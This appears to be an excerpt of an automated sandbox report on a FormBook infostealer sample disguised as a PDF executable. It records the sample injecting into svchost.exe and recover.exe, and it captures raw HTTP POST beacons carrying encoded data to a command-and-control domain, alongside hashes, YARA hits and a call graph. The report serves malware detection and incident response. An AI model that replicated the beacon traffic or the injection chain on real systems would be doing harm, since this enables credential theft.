                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: "66cce1df-b96"
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                        Dec 13, 2024 13:10:26.132584095 CET | 1236 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                        Dec 13, 2024 13:10:26.132594109 CET | 698 | IN | Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                        Session ID: 43 | Source IP: 192.168.2.4 | Source Port: 50050 | Destination IP: 3.33.130.190 | Destination Port: 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:10:47.026427984 CET | 776 | OUT | POST /d55l/ HTTP/1.1
                                                                        Host: www.tdassetmgt.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tdassetmgt.info
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.tdassetmgt.info/d55l/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 4d 69 67 47 79 79 58 59 68 73 62 68 64 53 4c 4b 49 59 77 74 54 67 56 37 75 46 4f 76 47 70 41 2b 48 78 58 65 2b 52 34 66 4a 6d 61 73 78 49 4e 4f 74 55 58 73 61 72 4e 56 78 47 52 66 38 4f 6a 71 72 31 78 4b 38 55 66 32 44 63 59 54 75 45 4c 68 65 4d 4b 58 61 66 75 45 74 45 36 6e 37 65 46 48 2b 6f 5a 79 65 50 45 37 47 67 6c 75 4f 33 6b 63 71 36 6b 44 78 37 72 6c 6e 6e 53 58 34 63 38 75 41 30 4f 57 49 39 6f 6b 48 52 72 2f 44 61 44 4b 6f 51 61 61 48 51 64 42 44 6c 46 42 45 33 56 51 51 56 63 56 75 64 4d 4c 59 73 6c 34 4c 71 2b 71 69 37 59 79 79 38 56 6f 53 57 61 61 2f 2b 58 59 32 67 3d 3d
                                                                        Data Ascii: 9B_ppt=MigGyyXYhsbhdSLKIYwtTgV7uFOvGpA+HxXe+R4fJmasxINOtUXsarNVxGRf8Ojqr1xK8Uf2DcYTuELheMKXafuEtE6n7eFH+oZyePE7GgluO3kcq6kDx7rlnnSX4c8uA0OWI9okHRr/DaDKoQaaHQdBDlFBE3VQQVcVudMLYsl4Lq+qi7Yyy8VoSWaa/+XY2g==
                                                                        Dec 13, 2024 13:10:48.112895966 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session ID: 44 | Source IP: 192.168.2.4 | Source Port: 50051 | Destination IP: 3.33.130.190 | Destination Port: 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:10:49.679757118 CET | 796 | OUT | POST /d55l/ HTTP/1.1
                                                                        Host: www.tdassetmgt.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tdassetmgt.info
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.tdassetmgt.info/d55l/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 4d 69 67 47 79 79 58 59 68 73 62 68 63 79 62 4b 4e 35 77 74 53 41 56 30 68 6c 4f 76 49 35 41 69 48 78 62 65 2b 51 4d 50 56 45 2b 73 2f 4d 4a 4f 73 52 72 73 58 4c 4e 56 70 32 52 65 79 75 6a 62 72 31 73 2f 38 52 66 32 44 64 34 54 75 42 33 68 66 37 57 55 62 50 75 43 30 55 36 6c 30 2b 46 48 2b 6f 5a 79 65 50 52 7a 47 6d 4e 75 4f 45 38 63 6c 34 41 63 79 37 72 6b 76 48 53 58 38 63 39 70 41 30 50 44 49 34 77 65 48 54 6a 2f 44 59 62 4b 72 42 61 56 4e 51 64 48 4f 46 45 58 4b 43 4d 79 59 45 78 43 6b 72 41 6c 56 59 74 46 44 4d 7a 77 7a 4b 35 6c 67 38 78 62 50 52 54 75 79 39 71 52 74 6c 77 58 4d 64 52 5a 64 74 61 77 54 63 7a 41 6a 74 52 70 58 68 38 3d
                                                                        Data Ascii: 9B_ppt=MigGyyXYhsbhcybKN5wtSAV0hlOvI5AiHxbe+QMPVE+s/MJOsRrsXLNVp2Reyujbr1s/8Rf2Dd4TuB3hf7WUbPuC0U6l0+FH+oZyePRzGmNuOE8cl4Acy7rkvHSX8c9pA0PDI4weHTj/DYbKrBaVNQdHOFEXKCMyYExCkrAlVYtFDMzwzK5lg8xbPRTuy9qRtlwXMdRZdtawTczAjtRpXh8=
                                                                        Dec 13, 2024 13:10:50.763427973 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close



                                                                        Target ID:0
                                                                        Start time:07:06:13
                                                                        Start date:13/12/2024
                                                                        Path:C:\Users\user\Desktop\SC_TR11670000_pdf.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\SC_TR11670000_pdf.exe"
                                                                        Imagebase:0xae0000
                                                                        File size:1'179'136 bytes
                                                                        MD5 hash:1EAD28DAD1FAE4A2478C61D096A3F162
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:07:06:15
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\SC_TR11670000_pdf.exe"
                                                                        Imagebase:0x580000
                                                                        File size:46'504 bytes
                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1924622437.0000000005730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1924200724.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:07:06:24
                                                                        Start date:13/12/2024
                                                                        Path:C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe"
                                                                        Imagebase:0xfb0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4204999427.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:3
                                                                        Start time:07:06:26
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\SysWOW64\recover.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\recover.exe"
                                                                        Imagebase:0x7f0000
                                                                        File size:12'288 bytes
                                                                        MD5 hash:D38B657A068016768CA9F3B5E100B472
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:7
                                                                        Start time:07:06:39
                                                                        Start date:13/12/2024
                                                                        Path:C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe"
                                                                        Imagebase:0xfb0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:8
                                                                        Start time:07:06:51
                                                                        Start date:13/12/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff6bf500000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true


                                                                          Execution Graph

                                                                          Execution Coverage:4.1%
                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                          Signature Coverage:2.6%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:174
                                                                          execution_graph 97888 b07e93 97889 b07e9f __close 97888->97889 97925 b0a048 GetStartupInfoW 97889->97925 97891 b07ea4 97927 b08dbc GetProcessHeap 97891->97927 97893 b07efc 97894 b07f07 97893->97894 98010 b07fe3 58 API calls 3 library calls 97893->98010 97928 b09d26 97894->97928 97897 b07f0d 97898 b07f18 __RTC_Initialize 97897->97898 98011 b07fe3 58 API calls 3 library calls 97897->98011 97949 b0d812 97898->97949 97901 b07f27 97902 b07f33 GetCommandLineW 97901->97902 98012 b07fe3 58 API calls 3 library calls 97901->98012 97968 b15173 GetEnvironmentStringsW 97902->97968 97905 b07f32 97905->97902 97908 b07f4d 97909 b07f58 97908->97909 98013 b032f5 58 API calls 3 library calls 97908->98013 97978 b14fa8 97909->97978 97912 b07f5e 97913 b07f69 97912->97913 98014 b032f5 58 API calls 3 library calls 97912->98014 97992 b0332f 97913->97992 97916 b07f71 97917 b07f7c __wwincmdln 97916->97917 98015 b032f5 58 API calls 3 library calls 97916->98015 97998 ae492e 97917->97998 97920 b07f90 97921 b07f9f 97920->97921 98016 b03598 58 API calls _doexit 97920->98016 98017 b03320 58 API calls _doexit 97921->98017 97924 b07fa4 __close 97926 b0a05e 97925->97926 97926->97891 97927->97893 98018 b033c7 36 API calls 2 library calls 97928->98018 97930 b09d2b 98019 b09f7c InitializeCriticalSectionAndSpinCount __getstream 97930->98019 97932 b09d30 97933 b09d34 97932->97933 98021 b09fca TlsAlloc 97932->98021 98020 b09d9c 61 API calls 2 library calls 97933->98020 97936 b09d39 97936->97897 97937 b09d46 97937->97933 97938 b09d51 97937->97938 98022 b08a15 97938->98022 97941 b09d93 98030 b09d9c 61 API calls 2 library calls 97941->98030 97944 b09d72 97944->97941 97946 b09d78 97944->97946 97945 b09d98 97945->97897 98029 b09c73 58 API calls 4 library calls 97946->98029 97948 b09d80 GetCurrentThreadId 97948->97897 97950 b0d81e __close 97949->97950 98042 b09e4b 97950->98042 97952 b0d825 97953 b08a15 __calloc_crt 58 API calls 
97952->97953 97954 b0d836 97953->97954 97955 b0d8a1 GetStartupInfoW 97954->97955 97956 b0d841 __close @_EH4_CallFilterFunc@8 97954->97956 97962 b0d8b6 97955->97962 97963 b0d9e5 97955->97963 97956->97901 97957 b0daad 98051 b0dabd LeaveCriticalSection _doexit 97957->98051 97959 b08a15 __calloc_crt 58 API calls 97959->97962 97960 b0da32 GetStdHandle 97960->97963 97961 b0da45 GetFileType 97961->97963 97962->97959 97962->97963 97964 b0d904 97962->97964 97963->97957 97963->97960 97963->97961 98050 b0a06b InitializeCriticalSectionAndSpinCount 97963->98050 97964->97963 97965 b0d938 GetFileType 97964->97965 98049 b0a06b InitializeCriticalSectionAndSpinCount 97964->98049 97965->97964 97969 b07f43 97968->97969 97970 b15184 97968->97970 97974 b14d6b GetModuleFileNameW 97969->97974 98091 b08a5d 58 API calls __malloc_crt 97970->98091 97972 b151aa _memmove 97973 b151c0 FreeEnvironmentStringsW 97972->97973 97973->97969 97976 b14d9f _wparse_cmdline 97974->97976 97975 b14ddf _wparse_cmdline 97975->97908 97976->97975 98092 b08a5d 58 API calls __malloc_crt 97976->98092 97979 b14fc1 __wsetenvp 97978->97979 97983 b14fb9 97978->97983 97980 b08a15 __calloc_crt 58 API calls 97979->97980 97988 b14fea __wsetenvp 97980->97988 97981 b15041 97982 b02f95 _free 58 API calls 97981->97982 97982->97983 97983->97912 97984 b08a15 __calloc_crt 58 API calls 97984->97988 97985 b15066 97986 b02f95 _free 58 API calls 97985->97986 97986->97983 97988->97981 97988->97983 97988->97984 97988->97985 97989 b1507d 97988->97989 98093 b14857 58 API calls __close 97988->98093 98094 b09006 IsProcessorFeaturePresent 97989->98094 97991 b15089 97991->97912 97993 b0333b __IsNonwritableInCurrentImage 97992->97993 98117 b0a711 97993->98117 97995 b03359 __initterm_e 97997 b03378 __cinit __IsNonwritableInCurrentImage 97995->97997 98120 b02f80 97995->98120 97997->97916 97999 ae49e7 97998->97999 98000 ae4948 97998->98000 97999->97920 98001 ae4982 IsThemeActive 98000->98001 98155 b035ac 98001->98155 98005 ae49ae 98167 ae4a5b 
SystemParametersInfoW SystemParametersInfoW 98005->98167 98007 ae49ba 98168 ae3b4c 98007->98168 98009 ae49c2 SystemParametersInfoW 98009->97999 98010->97894 98011->97898 98012->97905 98016->97921 98017->97924 98018->97930 98019->97932 98020->97936 98021->97937 98024 b08a1c 98022->98024 98025 b08a57 98024->98025 98026 b08a3a 98024->98026 98031 b15446 98024->98031 98025->97941 98028 b0a026 TlsSetValue 98025->98028 98026->98024 98026->98025 98039 b0a372 Sleep 98026->98039 98028->97944 98029->97948 98030->97945 98032 b15451 98031->98032 98036 b1546c 98031->98036 98033 b1545d 98032->98033 98032->98036 98040 b08d68 58 API calls __getptd_noexit 98033->98040 98034 b1547c RtlAllocateHeap 98034->98036 98037 b15462 98034->98037 98036->98034 98036->98037 98041 b035e1 DecodePointer 98036->98041 98037->98024 98039->98026 98040->98037 98041->98036 98043 b09e5c 98042->98043 98044 b09e6f EnterCriticalSection 98042->98044 98052 b09ed3 98043->98052 98044->97952 98046 b09e62 98046->98044 98076 b032f5 58 API calls 3 library calls 98046->98076 98049->97964 98050->97963 98051->97956 98053 b09edf __close 98052->98053 98054 b09f00 98053->98054 98055 b09ee8 98053->98055 98064 b09f21 __close 98054->98064 98080 b08a5d 58 API calls __malloc_crt 98054->98080 98077 b0a3ab 58 API calls 2 library calls 98055->98077 98057 b09eed 98078 b0a408 58 API calls 8 library calls 98057->98078 98060 b09f15 98062 b09f2b 98060->98062 98063 b09f1c 98060->98063 98061 b09ef4 98079 b032df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98061->98079 98067 b09e4b __lock 58 API calls 98062->98067 98081 b08d68 58 API calls __getptd_noexit 98063->98081 98064->98046 98068 b09f32 98067->98068 98070 b09f57 98068->98070 98071 b09f3f 98068->98071 98083 b02f95 98070->98083 98082 b0a06b InitializeCriticalSectionAndSpinCount 98071->98082 98074 b09f4b 98089 b09f73 LeaveCriticalSection _doexit 98074->98089 98077->98057 98078->98061 98080->98060 98081->98064 98082->98074 98084 b02f9e RtlFreeHeap 98083->98084 
99630->99632 99633 ae7eec 59 API calls 99631->99633 99634 ae4773 99632->99634 99636 ae479e 99633->99636 99635 ae79ab 59 API calls 99634->99635 99634->99636 99637 ae4794 99635->99637 99638 ae47bd 99636->99638 99639 b1d924 99636->99639 99654 ae47de 99636->99654 99641 ae7e8c 59 API calls 99637->99641 99643 ae7b52 59 API calls 99638->99643 99642 b1d9f4 99639->99642 99650 b1d9dd 99639->99650 99662 b1d95b 99639->99662 99641->99636 99645 ae7d2c 59 API calls 99642->99645 99648 ae47c7 99643->99648 99644 ae47ef 99646 ae4801 99644->99646 99647 ae81a7 59 API calls 99644->99647 99663 b1d9b1 99645->99663 99649 ae81a7 59 API calls 99646->99649 99651 ae4811 99646->99651 99647->99646 99653 ae79ab 59 API calls 99648->99653 99648->99654 99649->99651 99650->99642 99658 b1d9c8 99650->99658 99652 ae4818 99651->99652 99655 ae81a7 59 API calls 99651->99655 99656 ae81a7 59 API calls 99652->99656 99665 ae481f Mailbox 99652->99665 99653->99654 99732 ae79ab 99654->99732 99655->99652 99656->99665 99657 ae7b52 59 API calls 99657->99663 99661 ae7d2c 59 API calls 99658->99661 99659 b1d9b9 99660 ae7d2c 59 API calls 99659->99660 99660->99663 99661->99663 99662->99659 99666 b1d9a4 99662->99666 99663->99654 99663->99657 99745 ae7a84 59 API calls 2 library calls 99663->99745 99665->99516 99667 ae7d2c 59 API calls 99666->99667 99667->99663 99679->99487 99680->99494 99681->99573 99682->99571 99683->99571 99684->99571 99685->99571 99686->99546 99687->99549 99688->99570 99692 b1e181 99691->99692 99693 ae5e12 CreateFileW 99691->99693 99694 b1e187 CreateFileW 99692->99694 99695 ae5e34 99692->99695 99693->99695 99694->99695 99696 b1e1ad 99694->99696 99695->99599 99697 ae5c4e 2 API calls 99696->99697 99698 b1e1b8 99697->99698 99698->99695 99700 ae578b 99699->99700 99701 b1dfce 99699->99701 99702 ae5c4e 2 API calls 99700->99702 99715 ae581a 99700->99715 99701->99715 99724 ae5e3f 99701->99724 99703 ae57ad 99702->99703 99705 ae538e 59 API calls 99703->99705 99706 ae57b7 99705->99706 99706->99701 99707 ae57c4 
99706->99707 99708 b00ff6 Mailbox 59 API calls 99707->99708 99709 ae57cf 99708->99709 99710 ae538e 59 API calls 99709->99710 99711 ae57da 99710->99711 99718 ae5d20 99711->99718 99713 ae5807 99714 ae5c4e 2 API calls 99713->99714 99714->99715 99715->99601 99716->99603 99717->99606 99719 ae5d93 99718->99719 99722 ae5d2e 99718->99722 99729 ae5dae SetFilePointerEx 99719->99729 99721 ae5d56 99721->99713 99722->99721 99723 ae5d66 ReadFile 99722->99723 99723->99721 99723->99722 99725 ae5c4e 2 API calls 99724->99725 99726 ae5e60 99725->99726 99727 ae5c4e 2 API calls 99726->99727 99728 ae5e74 99727->99728 99728->99715 99729->99722 99730->99616 99731->99615 99733 ae79ba 99732->99733 99734 ae7a17 99732->99734 99733->99734 99736 ae79c5 99733->99736 99735 ae7e8c 59 API calls 99734->99735 99737 ae79e8 _memmove 99735->99737 99738 b1ef32 99736->99738 99739 ae79e0 99736->99739 99737->99644 99747 ae8189 99738->99747 99746 ae8087 59 API calls Mailbox 99739->99746 99742 b1ef3c 99743 b00ff6 Mailbox 59 API calls 99742->99743 99745->99663 99746->99737 99748 b00ff6 Mailbox 59 API calls 99747->99748 99749 ae8193 99748->99749 99749->99742 99750->98333 99752 ae6ef5 99751->99752 99756 ae7009 99751->99756 99753 b00ff6 Mailbox 59 API calls 99752->99753 99752->99756 99755 ae6f1c 99753->99755 99754 b00ff6 Mailbox 59 API calls 99757 ae6f91 99754->99757 99755->99754 99756->98337 99757->99756 99762->98340 99763->98342 100268 ae107d 100273 ae71eb 100268->100273 100270 ae108c 100271 b02f80 __cinit 67 API calls 100270->100271 100272 ae1096 100271->100272 100274 ae71fb __ftell_nolock 100273->100274 100275 ae77c7 59 API calls 100274->100275 100276 ae72b1 100275->100276 100277 ae4864 61 API calls 100276->100277 100278 ae72ba 100277->100278 100304 b0074f 100278->100304 100281 ae7e0b 59 API calls 100282 ae72d3 100281->100282 100283 ae3f84 59 API calls 100282->100283 100284 ae72e2 100283->100284 100285 ae77c7 59 API calls 100284->100285 100286 ae72eb 100285->100286 100287 ae7eec 59 API calls 100286->100287 
100288 ae72f4 RegOpenKeyExW 100287->100288 100289 b1ecda RegQueryValueExW 100288->100289 100293 ae7316 Mailbox 100288->100293 100290 b1ecf7 100289->100290 100291 b1ed6c RegCloseKey 100289->100291 100292 b00ff6 Mailbox 59 API calls 100290->100292 100291->100293 100296 b1ed7e _wcscat Mailbox __wsetenvp 100291->100296 100294 b1ed10 100292->100294 100293->100270 100295 ae538e 59 API calls 100294->100295 100297 b1ed1b RegQueryValueExW 100295->100297 100296->100293 100301 ae7f41 59 API calls 100296->100301 100302 ae3f84 59 API calls 100296->100302 100303 ae7b52 59 API calls 100296->100303 100298 b1ed38 100297->100298 100300 b1ed52 100297->100300 100299 ae7d2c 59 API calls 100298->100299 100299->100300 100300->100291 100301->100296 100302->100296 100303->100296 100305 b11b90 __ftell_nolock 100304->100305 100306 b0075c GetFullPathNameW 100305->100306 100307 b0077e 100306->100307 100308 ae7d2c 59 API calls 100307->100308 100309 ae72c5 100308->100309 100309->100281 100310 ae568a 100317 ae5c18 100310->100317 100316 ae56ba Mailbox 100318 b00ff6 Mailbox 59 API calls 100317->100318 100319 ae5c2b 100318->100319 100320 b00ff6 Mailbox 59 API calls 100319->100320 100321 ae569c 100320->100321 100322 ae5632 100321->100322 100336 ae5a2f 100322->100336 100324 ae5674 100324->100316 100328 ae81c1 MultiByteToWideChar 100324->100328 100325 ae5d20 2 API calls 100326 ae5643 100325->100326 100326->100324 100326->100325 100343 ae5bda 100326->100343 100329 ae822e 100328->100329 100330 ae81e7 100328->100330 100332 ae7eec 59 API calls 100329->100332 100331 b00ff6 Mailbox 59 API calls 100330->100331 100333 ae81fc MultiByteToWideChar 100331->100333 100335 ae8220 100332->100335 100359 ae78ad 100333->100359 100335->100316 100337 b1e065 100336->100337 100338 ae5a40 100336->100338 100352 b36443 59 API calls Mailbox 100337->100352 100338->100326 100340 b1e06f 100341 b00ff6 Mailbox 59 API calls 100340->100341 100342 b1e07b 100341->100342 100344 ae5bee 100343->100344 100345 b1e117 100343->100345 100353 
ae5b19 100344->100353 100358 b36443 59 API calls Mailbox 100345->100358 100348 ae5bfa 100348->100326 100349 b1e122 100350 b00ff6 Mailbox 59 API calls 100349->100350 100351 b1e137 _memmove 100350->100351 100352->100340 100354 ae5b31 100353->100354 100357 ae5b2a _memmove 100353->100357 100355 b00ff6 Mailbox 59 API calls 100354->100355 100356 b1e0a7 100354->100356 100355->100357 100356->100356 100357->100348 100358->100349 100360 ae792f 100359->100360 100361 ae78bc 100359->100361 100362 ae7e8c 59 API calls 100360->100362 100361->100360 100363 ae78c8 100361->100363 100369 ae78da _memmove 100362->100369 100364 ae78d2 100363->100364 100365 ae7900 100363->100365 100371 ae8087 59 API calls Mailbox 100364->100371 100366 ae8189 59 API calls 100365->100366 100368 ae790a 100366->100368 100370 b00ff6 Mailbox 59 API calls 100368->100370 100369->100335 100370->100369 100371->100369 100372 b20226 100378 aeade2 Mailbox 100372->100378 100374 b20c86 100536 b366f4 100374->100536 100376 b20c8f 100377 ae9df0 Mailbox 59 API calls 100377->100378 100378->100374 100378->100376 100378->100377 100379 b200e0 VariantClear 100378->100379 100380 aeb6c1 100378->100380 100385 b5474d 331 API calls 100378->100385 100389 b4d2e5 100378->100389 100436 b5e237 100378->100436 100439 b6251d 100378->100439 100444 b4d2e6 100378->100444 100491 af2123 100378->100491 100531 b5e24b 100378->100531 100534 b37405 59 API calls 100378->100534 100379->100378 100535 b4a0b5 89 API calls 4 library calls 100380->100535 100385->100378 100390 b4d305 100389->100390 100391 b4d310 100389->100391 100392 ae9c9c 59 API calls 100390->100392 100393 b4d3ea Mailbox 100391->100393 100395 ae77c7 59 API calls 100391->100395 100392->100391 100394 b00ff6 Mailbox 59 API calls 100393->100394 100434 b4d3f3 Mailbox 100393->100434 100396 b4d433 100394->100396 100397 b4d334 100395->100397 100398 b4d43f 100396->100398 100540 ae5906 60 API calls Mailbox 100396->100540 100399 ae77c7 59 API calls 100397->100399 100402 ae9997 84 API calls 
